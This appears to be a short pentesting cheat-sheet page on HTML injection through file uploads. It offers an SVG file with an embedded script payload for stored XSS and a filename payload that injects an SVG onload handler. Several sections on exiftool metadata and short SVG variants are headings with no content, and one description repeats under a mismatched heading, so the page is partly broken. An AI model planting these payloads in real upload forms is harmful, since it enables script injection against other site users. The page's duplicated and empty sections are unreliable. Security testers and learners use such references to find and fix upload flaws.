💉File Upload HTML Injection
Stored XSS through SVG
Which when loaded will trigger the XSS payload marked above. Any SVG file can contain javascript code, but to execute it you have to be able to access the file directly via either writing it to the page or visiting the SVG file directly. Embedding it in e.g. an img tag will not work
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100">
<circle cx="50" cy="50" r="48" fill="none" stroke="#000"/>
<path d="M50,2a48,48 0 1 1 0,96a24 24 0 1 1 0-48a24 24 0 1 0 0-48"/>
<circle cx="50" cy="26" r="6"/>
<circle cx="50" cy="74" r="6" fill="#FFF"/>
***<script>alert("XSS through SVG");</script>***
</svg>----------------------------------------------------------------
File Upload HTML Injection – Filename
Use when the uploaded filename is reflected somewhere on the target page. It usually leads to Self XSS scenarios though.
--------------------------------------------------------------------
"><svg onload=alert(1)>.gif
------------------------------------------------------------------------------------------------------------------------------------
File Upload HTML Injection – Metadata
Use when metadata of the uploaded file is reflected somewhere on the target page. It uses command-line exiftool (“$” is the terminal prompt) and any metadata field can be set.
----------------------------------------------------------------
File Upload Injection – SVG File
Use to create a stored XSS on target when uploading image files. Save the content below as “xss.svg”.
----------------------------------------------------------------
File Upload HTML Injection – SVG File
Use when metadata of the uploaded file is reflected somewhere on the target page. It uses command-line exiftool (“$” is the terminal prompt) and any metadata field can be set.
----------------------------------------------------------------
XSS in SVG
----------------------------------------------------------------
XSS in SVG (short)
Last updated